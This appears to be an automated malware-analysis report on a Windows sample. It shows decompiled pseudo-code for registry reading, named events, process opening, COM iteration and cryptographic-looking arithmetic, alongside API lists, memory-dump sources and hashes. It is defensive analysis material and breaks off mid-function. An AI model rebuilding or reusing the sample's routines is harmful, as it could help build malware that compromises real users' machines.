                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0050202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                        				signed int _v8;
                        				char _v12;
                        				signed int* _v16;
                        				char _v284;
                        				void* __esi;
                        				char* _t60;
                        				intOrPtr* _t61;
                        				intOrPtr _t65;
                        				char _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				intOrPtr _t75;
                        				void* _t78;
                        				void* _t88;
                        				void* _t97;
                        				void* _t98;
                        				char _t104;
                        				signed int* _t106;
                        				intOrPtr* _t107;
                        				void* _t108;
                        
                        				_t98 = __ecx;
                        				_v8 = _v8 & 0x00000000;
                        				_t104 = _a16;
                        				if(_t104 == 0) {
                        					__imp__( &_v284,  *0x50a38c);
                        					_t97 = 0x80000002;
                        					L6:
                        					_t60 = E005033FA(0,  &_v284);
                        					_a8 = _t60;
                        					if(_t60 == 0) {
                        						_v8 = 8;
                        						L29:
                        						_t61 = _a20;
                        						if(_t61 != 0) {
                        							 *_t61 =  *_t61 + 1;
                        						}
                        						return _v8;
                        					}
                        					_t15 =  &_a24; // 0x50742d
                        					_t107 =  *_t15;
                        					if(E00504B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
                        						L27:
                        						E00502A03(_a8);
                        						goto L29;
                        					}
                        					_t65 =  *0x50a2d0; // 0x2add5a8
                        					_t16 = _t65 + 0x50b908; // 0x65696c43
                        					_t68 = E005033FA(0, _t16);
                        					_a24 = _t68;
                        					if(_t68 == 0) {
                        						L14:
                        						if(E00505C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a384,  *((intOrPtr*)( *((intOrPtr*)(_t107 + 0x14)) + 0x28))) == 0) {
                        							_t72 =  *0x50a2d0; // 0x2add5a8
                        							if(_t104 == 0) {
                        								_t35 = _t72 + 0x50ba0f; // 0x4d4c4b48
                        								_t73 = _t35;
                        							} else {
                        								_t34 = _t72 + 0x50b927; // 0x55434b48
                        								_t73 = _t34;
                        							}
                        							_t37 =  &_a24; // 0x50742d
                        							if(E0050762C(_t73,  *0x50a384,  *0x50a388, _t37,  &_a16) == 0) {
                        								if(_t104 == 0) {
                        									_t75 =  *0x50a2d0; // 0x2add5a8
                        									_t44 = _t75 + 0x50b893; // 0x74666f53
                        									_t78 = E005033FA(0, _t44);
                        									_t105 = _t78;
                        									if(_t78 == 0) {
                        										_v8 = 8;
                        									} else {
                        										_t45 =  &_a24; // 0x50742d
                        										E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a388,  *_t45);
                        										E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _t105,  *0x50a380, _a16);
                        										E00502A03(_t105);
                        									}
                        								} else {
                        									_t38 =  &_a24; // 0x50742d
                        									E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a388,  *_t38);
                        									E005033B7( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *0x50a380, _a16);
                        								}
                        								if( *_t107 != 0) {
                        									_t52 =  &_a24; // 0x50742d
                        									E00502A03( *_t52);
                        								} else {
                        									 *_t107 = _a16;
                        								}
                        							}
                        						}
                        						goto L27;
                        					}
                        					if(E00505419( *((intOrPtr*)(_t107 + 0x10)), _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                        						_t106 = _v16;
                        						_t88 = 0x28;
                        						if(_v12 == _t88) {
                        							 *_t106 =  *_t106 & 0x00000000;
                        							_t24 =  &_a24; // 0x50742d
                        							E00505C15(_t103,  *((intOrPtr*)(_t107 + 0x10)), _t97, _a8,  *_t24, _t106);
                        						}
                        						E00502A03(_t106);
                        						_t104 = _a16;
                        					}
                        					_t28 =  &_a24; // 0x50742d
                        					E00502A03( *_t28);
                        					goto L14;
                        				}
                        				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                        					goto L29;
                        				} else {
                        					_t103 = _a8;
                        					E00507973(_t104, _a8,  &_v284);
                        					__imp__(_t108 + _t104 - 0x117,  *0x50a38c);
                        					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                        					_t97 = 0x80000003;
                        					goto L6;
                        				}
                        			}
























                        APIs
                        • StrChrA.SHLWAPI(00507319,0000005F,00000000,00000000,00000104), ref: 00502061
                        • lstrcpy.KERNEL32(?,?), ref: 0050208E
                          • Part of subcall function 005033FA: lstrlen.KERNEL32(?,0050A380,73BB7FC0,00000000,00502788,?,?,?,?,?,00503EAC,?), ref: 00503403
                          • Part of subcall function 005033FA: mbstowcs.NTDLL ref: 0050342A
                          • Part of subcall function 005033FA: memset.NTDLL ref: 0050343C
                          • Part of subcall function 005033B7: lstrlenW.KERNEL32(00507319,?,-tP,00502202,00000000,80000002,?,-tP,74666F53,4D4C4B48,-tP,?,00000000,80000002,00507319,?), ref: 005033D7
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        • lstrcpy.KERNEL32(?,00000000), ref: 005020B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                        • String ID: -tP$\
                        • API String ID: 3924217599-3836213674
                        • Opcode ID: 59a7593bf89793a51705315d67465467dd013af7b6e54df66df0b22d0122fa5e
                        • Instruction ID: 0018446a5262340a48c423e5e672bad1248e4e20a32e505da59a8c6aeb35680d
                        • Opcode Fuzzy Hash: 59a7593bf89793a51705315d67465467dd013af7b6e54df66df0b22d0122fa5e
                        • Instruction Fuzzy Hash: 9D51487650020AAFDF219FA0DC89EAE3BB9FF58300F108855FA15961A1DB35DA19EF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E00504CD5(signed int _a4, signed int* _a8) {
                        				void* __ecx;
                        				void* __edi;
                        				signed int _t6;
                        				intOrPtr _t8;
                        				intOrPtr _t12;
                        				void* _t25;
                        				void* _t26;
                        				signed int* _t27;
                        				signed short* _t28;
                        				CHAR* _t30;
                        				long _t31;
                        				intOrPtr* _t32;
                        
                        				_t6 =  *0x50a2c8; // 0xbd092303
                        				_t1 =  &_a4; // 0x507338
                        				_t32 =  *_t1;
                        				_a4 = _t6 ^ 0xd05b5869;
                        				_t8 =  *0x50a2d0; // 0x2add5a8
                        				_t3 = _t8 + 0x50b84d; // 0x61636f4c
                        				_t25 = 0;
                        				_t30 = E00501970(_t3, 1);
                        				if(_t30 != 0) {
                        					_t25 = CreateEventA(0x50a2d4, 1, 0, _t30);
                        					E00502A03(_t30);
                        				}
                        				_t12 =  *0x50a2b4; // 0x2000000a
                        				if(_t12 != 6 || _t12 < 2) {
                        					if( *_t32 != 0 && E005019E7() == 0) {
                        						_t28 =  *0x50a124( *_t32, 0x20);
                        						if(_t28 != 0) {
                        							 *_t28 =  *_t28 & 0x00000000;
                        							_t28 =  &(_t28[1]);
                        						}
                        						_t31 = E005063CD(0, _t28,  *_t32, 0);
                        						if(_t31 == 0) {
                        							if(_t25 == 0) {
                        								goto L21;
                        							}
                        							_t31 = WaitForSingleObject(_t25, 0x4e20);
                        							if(_t31 == 0) {
                        								goto L19;
                        							}
                        						}
                        					}
                        					goto L11;
                        				} else {
                        					L11:
                        					_t27 = _a8;
                        					if(_t27 != 0) {
                        						 *_t27 =  *_t27 | 0x00000001;
                        					}
                        					_t31 = E00507836(_t32, _t26);
                        					if(_t31 == 0 && _t25 != 0) {
                        						_t31 = WaitForSingleObject(_t25, 0x4e20);
                        					}
                        					if(_t27 != 0 && _t31 != 0) {
                        						 *_t27 =  *_t27 & 0xfffffffe;
                        					}
                        					L19:
                        					if(_t25 != 0) {
                        						CloseHandle(_t25);
                        					}
                        					L21:
                        					return _t31;
                        				}
                        			}
















                        APIs
                          • Part of subcall function 00501970: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,745EC740,00503EC5,74666F53,00000000,?,00000000,?,?,00502F4F), ref: 005019A6
                          • Part of subcall function 00501970: lstrcpy.KERNEL32(00000000,00000000), ref: 005019CA
                          • Part of subcall function 00501970: lstrcat.KERNEL32(00000000,00000000), ref: 005019D2
                        • CreateEventA.KERNEL32(0050A2D4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504D14
                          • Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F
                        • WaitForSingleObject.KERNEL32(00000000,00004E20,8sP,00000000,?,00000000,?,00507338,?,?,?,?,?,?,?,00501C40), ref: 00504D72
                        • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504DA0
                        • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,00507338,?,?,?), ref: 00504DB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                        • String ID: 8sP
                        • API String ID: 73268831-3124762363
                        • Opcode ID: e36d04cac9989331e58a216b8c5c143055f737fa4d547feaaedd31b2130c74bd
                        • Instruction ID: 4f05aa4910456ab2cacc1a8d95b86829c99e7a6d7d354c2462ea68d57462533f
                        • Opcode Fuzzy Hash: e36d04cac9989331e58a216b8c5c143055f737fa4d547feaaedd31b2130c74bd
                        • Instruction Fuzzy Hash: 6F21E2B3600726ABD7215BA89D88B9F7BD8BF58711F050624FF41972D1EB70CC049AC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E00505419(int _a4, void* _a8, int _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                        				intOrPtr* _t39;
                        				char* _t42;
                        				long _t43;
                        
                        				if(_a4 != 0) {
                        					_t43 = E00506087(_a4, _a8, _a12, _a16, _a20, _a24);
                        				} else {
                        					_t43 =  *0x50a0d0(_a8, _a12,  &_a8);
                        					if(_t43 == 0) {
                        						RegQueryValueExW(_a8, _a16, 0,  &_a4, 0,  &_a12);
                        						if(_a12 == 0) {
                        							_t43 = 0xe8;
                        						} else {
                        							_t42 = E00505C4E(_a12);
                        							if(_t42 == 0) {
                        								_t43 = 8;
                        							} else {
                        								_t43 = RegQueryValueExW(_a8, _a16, 0,  &_a4, _t42,  &_a12);
                        								if(_t43 != 0) {
                        									E00502A03(_t42);
                        								} else {
                        									 *_a20 = _t42;
                        									_t39 = _a24;
                        									if(_t39 != 0) {
                        										 *_t39 = _a12;
                        									}
                        								}
                        							}
                        						}
                        						RegCloseKey(_a8);
                        					}
                        				}
                        				return _t43;
                        			}







                        APIs
                        • RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002), ref: 0050545B
                        • RegCloseKey.ADVAPI32(80000002,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002,00000000,?), ref: 005054B0
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43), ref: 00505480
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: QueryValue$AllocateCloseHeap
                        • String ID: -tP$6{P
                        • API String ID: 466008484-867194812
                        • Opcode ID: 55f3203ac2281a1ec41b342400ea716fc5b22c9b58ac872abc52a4f8baac8068
                        • Instruction ID: 009b1fc1bd870bdf6e325b969b9439ce19f4dfb7f312596acc69553d05baccc6
                        • Opcode Fuzzy Hash: 55f3203ac2281a1ec41b342400ea716fc5b22c9b58ac872abc52a4f8baac8068
                        • Instruction Fuzzy Hash: 3D21287250061EAFDF119F94EC84CEF3FA9FB14361B108425FE1596160E7329D60AFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _malloc.LIBCMT ref: 6C550898
                          • Part of subcall function 6C547276: __FF_MSGBANNER.LIBCMT ref: 6C54728D
                          • Part of subcall function 6C547276: __NMSG_WRITE.LIBCMT ref: 6C547294
                          • Part of subcall function 6C547276: RtlAllocateHeap.NTDLL(6D56935C,00000000,00000001), ref: 6C5472B9
                        • _free.LIBCMT ref: 6C5508AB
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
                        • Instruction ID: 769f1eab436e2ce4118b27321232a20ba578d820adf8f7ba1b35b09306f86845
                        • Opcode Fuzzy Hash: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
                        • Instruction Fuzzy Hash: E411C172949395EBEF106B789C04B9A3BB59F813ACB558527F81486E50DF348864CAD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00502A18(intOrPtr _a4) {
                        				void* _t2;
                        				long _t4;
                        				void* _t5;
                        				long _t6;
                        				void* _t7;
                        
                        				_t2 = CreateEventA(0, 1, 0, 0);
                        				 *0x50a2c4 = _t2;
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				_t4 = GetVersion();
                        				if(_t4 <= 5) {
                        					_t5 = 0x32;
                        					return _t5;
                        				}
                        				 *0x50a2b4 = _t4;
                        				_t6 = GetCurrentProcessId();
                        				 *0x50a2b0 = _t6;
                        				 *0x50a2bc = _a4;
                        				_t7 = OpenProcess(0x10047a, 0, _t6);
                        				 *0x50a2ac = _t7;
                        				if(_t7 == 0) {
                        					 *0x50a2ac =  *0x50a2ac | 0xffffffff;
                        				}
                        				return 0;
                        			}









                        APIs
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0050446F,?,?,00000001), ref: 00502A20
                        • GetVersion.KERNEL32(?,00000001), ref: 00502A2F
                        • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00502A3E
                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00502A5B
                        • GetLastError.KERNEL32(?,00000001), ref: 00502A7A
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                        • String ID:
                        • API String ID: 2270775618-0
                        • Opcode ID: 1eb3ec5e3aea4462ea7a05ff845469605bb08fcfd33cce308a2781943cd098a1
                        • Instruction ID: 77b605879d651020a8399b522ac2d800151ca519abac9e4b7470c2ecb6a85460
                        • Opcode Fuzzy Hash: 1eb3ec5e3aea4462ea7a05ff845469605bb08fcfd33cce308a2781943cd098a1
                        • Instruction Fuzzy Hash: B0F03A78B95302AFE3209F75AD1D71D3EA5B764740F108529E246C52E5DBB14408EF1A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _wcscmp
                        • String ID: ACP$OCP
                        • API String ID: 856254489-711371036
                        • Opcode ID: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
                        • Instruction ID: e32e385c8bb73fe654b9a52975f30fe24852345029cc45bad2e47c01f4767da8
                        • Opcode Fuzzy Hash: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
                        • Instruction Fuzzy Hash: 9801C032215345BEFB009A59DC85FDA33EC9F0076CF808427F904EAB81FB30DAA48294
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E005013B4(intOrPtr* __eax) {
                        				void* _v8;
                        				WCHAR* _v12;
                        				void* _v16;
                        				char _v20;
                        				void* _v24;
                        				intOrPtr _v28;
                        				void* _v32;
                        				intOrPtr _v40;
                        				short _v48;
                        				intOrPtr _v56;
                        				short _v64;
                        				intOrPtr* _t54;
                        				intOrPtr* _t56;
                        				intOrPtr _t57;
                        				intOrPtr* _t58;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr* _t63;
                        				intOrPtr* _t65;
                        				intOrPtr* _t67;
                        				intOrPtr* _t69;
                        				intOrPtr* _t71;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr _t78;
                        				intOrPtr* _t82;
                        				intOrPtr* _t86;
                        				intOrPtr _t102;
                        				intOrPtr _t108;
                        				void* _t117;
                        				void* _t121;
                        				void* _t122;
                        				intOrPtr _t129;
                        
                        				_t122 = _t121 - 0x3c;
                        				_push( &_v8);
                        				_push(__eax);
                        				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                        				if(_t117 >= 0) {
                        					_t54 = _v8;
                        					_t102 =  *0x50a2d0; // 0x2add5a8
                        					_t5 = _t102 + 0x50b038; // 0x3050f485
                        					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                        					_t56 = _v8;
                        					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                        					if(_t117 >= 0) {
                        						__imp__#2(0x5092d0);
                        						_v28 = _t57;
                        						if(_t57 == 0) {
                        							_t117 = 0x8007000e;
                        						} else {
                        							_t60 = _v32;
                        							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                        							_t86 = __imp__#6;
                        							_t117 = _t61;
                        							if(_t117 >= 0) {
                        								_t63 = _v24;
                        								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                        								if(_t117 >= 0) {
                        									_t129 = _v20;
                        									if(_t129 != 0) {
                        										_v64 = 3;
                        										_v48 = 3;
                        										_v56 = 0;
                        										_v40 = 0;
                        										if(_t129 > 0) {
                        											while(1) {
                        												_t67 = _v24;
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												_t122 = _t122;
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                        												if(_t117 < 0) {
                        													goto L16;
                        												}
                        												_t69 = _v8;
                        												_t108 =  *0x50a2d0; // 0x2add5a8
                        												_t28 = _t108 + 0x50b0bc; // 0x3050f1ff
                        												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                        												if(_t117 >= 0) {
                        													_t74 = _v16;
                        													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                        													if(_t117 >= 0 && _v12 != 0) {
                        														_t78 =  *0x50a2d0; // 0x2add5a8
                        														_t33 = _t78 + 0x50b078; // 0x76006f
                        														if(lstrcmpW(_v12, _t33) == 0) {
                        															_t82 = _v16;
                        															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                        														}
                        														 *_t86(_v12);
                        													}
                        													_t76 = _v16;
                        													 *((intOrPtr*)( *_t76 + 8))(_t76);
                        												}
                        												_t71 = _v8;
                        												 *((intOrPtr*)( *_t71 + 8))(_t71);
                        												_v40 = _v40 + 1;
                        												if(_v40 < _v20) {
                        													continue;
                        												}
                        												goto L16;
                        											}
                        										}
                        									}
                        								}
                        								L16:
                        								_t65 = _v24;
                        								 *((intOrPtr*)( *_t65 + 8))(_t65);
                        							}
                        							 *_t86(_v28);
                        						}
                        						_t58 = _v32;
                        						 *((intOrPtr*)( *_t58 + 8))(_t58);
                        					}
                        				}
                        				return _t117;
                        			}





































                        APIs
                        • SysAllocString.OLEAUT32(005092D0), ref: 00501404
                        • lstrcmpW.KERNEL32(00000000,0076006F), ref: 005014E6
                        • SysFreeString.OLEAUT32(00000000), ref: 005014FF
                        • SysFreeString.OLEAUT32(?), ref: 0050152E
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$Free$Alloclstrcmp
                        • String ID:
                        • API String ID: 1885612795-0
                        • Opcode ID: 45ac9ef248c0f14181fc9701f5cb3e2145cabf53ba3b730bd1276c7945aeb71b
                        • Instruction ID: d7ee52f42c5acf68f6120e6320f6aebaefde6f38f6939f15676d79133e8a9c02
                        • Opcode Fuzzy Hash: 45ac9ef248c0f14181fc9701f5cb3e2145cabf53ba3b730bd1276c7945aeb71b
                        • Instruction Fuzzy Hash: 3E511D75D0090ADFCB11DBA8C8888AEB7B9FFC9704B144594E916EF265D7319D01CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __Getcvt.LIBCPMT ref: 6C542371
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,00000001,?), ref: 6C5423BF
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C542435
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C54245D
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ByteCharMultiWide$Getcvt
                        • String ID:
                        • API String ID: 3195005509-0
                        • Opcode ID: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
                        • Instruction ID: 368c42ebfee037e389d4d3dc3f377a64b62501de662ef2be758ff76a58f0bcb2
                        • Opcode Fuzzy Hash: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
                        • Instruction Fuzzy Hash: 8641D13160436AEFDB158F65CC48B6E7BBAAF42315F15C529F854DBA80D770E884CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E00501E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				void _v156;
                        				void _v428;
                        				void* _t55;
                        				unsigned int _t56;
                        				signed int _t66;
                        				signed int _t74;
                        				void* _t76;
                        				signed int _t79;
                        				void* _t81;
                        				void* _t92;
                        				void* _t96;
                        				signed int* _t99;
                        				signed int _t101;
                        				signed int _t103;
                        				void* _t107;
                        
                        				_t92 = _a12;
                        				_t101 = __eax;
                        				_t55 = E00505278(_a16, _t92);
                        				_t79 = _t55;
                        				if(_t79 == 0) {
                        					L18:
                        					return _t55;
                        				}
                        				_t56 =  *(_t92 + _t79 * 4 - 4);
                        				_t81 = 0;
                        				_t96 = 0x20;
                        				if(_t56 == 0) {
                        					L4:
                        					_t97 = _t96 - _t81;
                        					_v12 = _t96 - _t81;
                        					E00502399(_t79,  &_v428);
                        					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00503C32(_t101,  &_v428, _a8, _t96 - _t81);
                        					E00503C32(_t79,  &_v156, _a12, _t97);
                        					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                        					_t66 = E00502399(_t101,  &E0050A188);
                        					_t103 = _t101 - _t79;
                        					_a8 = _t103;
                        					if(_t103 < 0) {
                        						L17:
                        						E00502399(_a16, _a4);
                        						E0050114C(_t79,  &_v428, _a4, _t97);
                        						memset( &_v428, 0, 0x10c);
                        						_t55 = memset( &_v156, 0, 0x84);
                        						goto L18;
                        					}
                        					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                        					do {
                        						if(_v8 != 0xffffffff) {
                        							_push(1);
                        							_push(0);
                        							_push(0);
                        							_push( *_t99);
                        							L00507F56();
                        							_t74 = _t66 +  *(_t99 - 4);
                        							asm("adc edx, esi");
                        							_push(0);
                        							_push(_v8 + 1);
                        							_push(_t92);
                        							_push(_t74);
                        							L00507F50();
                        							if(_t92 > 0 || _t74 > 0xffffffff) {
                        								_t74 = _t74 | 0xffffffff;
                        								_v16 = _v16 & 0x00000000;
                        							}
                        						} else {
                        							_t74 =  *_t99;
                        						}
                        						_t106 = _t107 + _a8 * 4 - 0x1a8;
                        						_a12 = _t74;
                        						_t76 = E00505381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                        						while(1) {
                        							 *_t99 =  *_t99 - _t76;
                        							if( *_t99 != 0) {
                        								goto L14;
                        							}
                        							L13:
                        							_t92 =  &_v156;
                        							if(E005045B4(_t79, _t92, _t106) < 0) {
                        								break;
                        							}
                        							L14:
                        							_a12 = _a12 + 1;
                        							_t76 = E00505936(_t79,  &_v156, _t106, _t106);
                        							 *_t99 =  *_t99 - _t76;
                        							if( *_t99 != 0) {
                        								goto L14;
                        							}
                        							goto L13;
                        						}
                        						_a8 = _a8 - 1;
                        						_t66 = _a12;
                        						_t99 = _t99 - 4;
                        						 *(_a8 * 4 +  &E0050A188) = _t66;
                        					} while (_a8 >= 0);
                        					_t97 = _v12;
                        					goto L17;
                        				}
                        				while(_t81 < _t96) {
                        					_t81 = _t81 + 1;
                        					_t56 = _t56 >> 1;
                        					if(_t56 != 0) {
                        						continue;
                        					}
                        					goto L4;
                        				}
                        				goto L4;
                        			}

                        APIs
                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00501F44
                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00501F5A
                        • memset.NTDLL ref: 00502003
                        • memset.NTDLL ref: 00502019
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memset$_allmul_aulldiv
                        • String ID:
                        • API String ID: 3041852380-0
                        • Opcode ID: 7bf336c58bf99480f7c90a346c1bbe4bac932f200baf146395987f9c4529b129
                        • Instruction ID: 98ded4d5207a576f2454746d9e09bd605d0f00ef0d0246290f08ebeab5aa2ba2
                        • Opcode Fuzzy Hash: 7bf336c58bf99480f7c90a346c1bbe4bac932f200baf146395987f9c4529b129
                        • Instruction Fuzzy Hash: 2C41A071A0061AAFDB20DF68CC49BEE7B79BF85310F004569B909A72C1EB709E458B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        • Opcode ID: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
                        • Instruction ID: 076f22894ae71d492647b2c662552c02d69159ee23f0aeea712e0f25032e28c5
                        • Opcode Fuzzy Hash: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
                        • Instruction Fuzzy Hash: E141C631B056059BDB18CF69CC905AE77A6EF913A8B21CA3DE815C7A40E770DD85CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 56%
                        			E0050467C(void* __eax) {
                        				long _v8;
                        				char _v12;
                        				char _v16;
                        				intOrPtr _v20;
                        				void* _v24;
                        				void* __esi;
                        				char* _t40;
                        				long _t41;
                        				intOrPtr _t45;
